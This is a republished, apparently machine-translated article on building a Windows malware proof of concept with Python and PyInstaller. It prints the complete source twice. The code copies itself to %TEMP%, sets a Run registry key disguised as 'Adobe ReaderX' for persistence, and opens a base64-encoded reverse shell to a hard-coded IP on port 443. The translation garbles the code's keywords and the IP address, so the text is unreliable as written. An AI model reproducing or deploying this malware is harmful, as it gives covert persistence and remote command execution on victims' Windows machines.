Technology sharing: Build poc for malware by using python and PyInstaller

Source: Internet
Author: User

Technology sharing: Build poc for malware by using python and PyInstaller

Disclaimer: This article is intended to be shared and never used maliciously!
This article mainly shows how to use python and PyInstaller to build some poc of malware.

As we all know, malware often launch sustained attacks on the target. There are many methods to achieve this in windows. The most common practice is to modify the following registry key: "Software \ Microsoft \ Windows \ CurrentVersion \ Run ". The following code copies the program to the % TEMP % directory using python, and then modifies the registry so that the code can be executed when the user logs on to the computer.
Import sys, base64, OS, socket, subprocess
From _ winreg import *
Def autorun (tempdir, fileName, run ):
# Copy executable to % TEMP %:
OS. system ('Copy % s % s' % (fileName, tempdir ))
# Queries Windows registry for key values
# Appends autorun key to runkey array
Key = OpenKey (HKEY_LOCAL_MACHINE, run)
Runkey = []
Try:
I = 0
While True:
Subkey = EnumValue (key, I)
Runkey. append (subkey [0])
I + = 1
Failed t WindowsError:
Pass
# Set autorun key:
If 'adobe readerx' not in runkey:
Try:
Key = OpenKey (HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
SetValueEx (key, 'adobe _ readerx', 0, REG_SZ, r "% TEMP % \ mw.exe ")
Key. Close ()
Failed t WindowsError:
Pass
After we put the code in the % TEMP % directory and set the continuity, we can execute the next part of the code, reverse shell. Here, I used the reverse shell of python published by TrustedSec, but made some changes-Base64 encoding for network traffic.
Def shell (): # Base64 encoded reverse shell s = socket. socket (socket. AF_INET, socket. SOCK_STREAM) s. connect ('2017. 168.56.1 ', int (443) s. send ('[*] Connection Established! ') While 1: data = s. recv (1024) if data = "quit": break proc = subprocess. popen (data, shell = True, stdout = subprocess. PIPE, stderr = subprocess. PIPE, stdin = subprocess. PIPE) stdout_value = proc. stdout. read () + proc. stderr. read () encoded = base64.b64encode (stdout_value) s. send (encoded) # s. send (stdout_value) s. close () def main (): tempdir = '% TEMP %' fileName = sys. argv [0] run = "Software \ Microsoft \ Windows \ CurrentVersion \ Run" autorun (tempdir, fileName, run) shell () if _ name _ = "_ main _": main ()
Now, when this program is executed, it will open a reverse shell and return it to the "attacker ". In this case, the "attacker" is only a hard-coded ip address in the script, but it is very simple and easy in a domain or on the Amazon cloud. It shows that the program is executed on a Windows host and connected to attackers. You can note that the network traffic here is base64-encoded:

The complete code is as follows:
Import sys, base64, OS, socket, subprocessfrom _ winreg import * def autorun (tempdir, fileName, run): # Copy executable to % TEMP %: OS. system ('Copy % s % s' % (fileName, tempdir) # Queries Windows registry for the autorun key value # Stores the key values in runkey array key = OpenKey (HKEY_LOCAL_MACHINE, run) runkey = [] try: I = 0 while True: subkey = EnumValue (key, I) runkey. append (subkey [0]) I + = 1 Tb WindowsError: pass # If the autorun key "Adobe ReaderX" isn't set this will set the key: if 'adobe readerx' not in runkey: try: key = OpenKey (HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS) SetValueEx (key, 'adobe _ readerx', 0, REG_SZ, r "% TEMP % \ mw.exe") key. close () handle T WindowsError: passdef shell (): # Base64 encoded reverse shell s = socket. socket (socket. AF_INET, socket. SOCK_STREAM) s. connect ('2017. 168.56.1', Int (443) s. send ('[*] Connection Established! ') While 1: data = s. recv (1024) if data = "quit": break proc = subprocess. popen (data, shell = True, stdout = subprocess. PIPE, stderr = subprocess. PIPE, stdin = subprocess. PIPE) stdout_value = proc. stdout. read () + proc. stderr. read () encoded = base64.b64encode (stdout_value) s. send (encoded) # s. send (stdout_value) s. close () def main (): tempdir = '% TEMP %' fileName = sys. argv [0] run = "Software \ Microsoft \ Windows \ CurrentVersion \ Run" autorun (tempdir, fileName, run) shell () if _ name _ = "_ main _": main ()
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.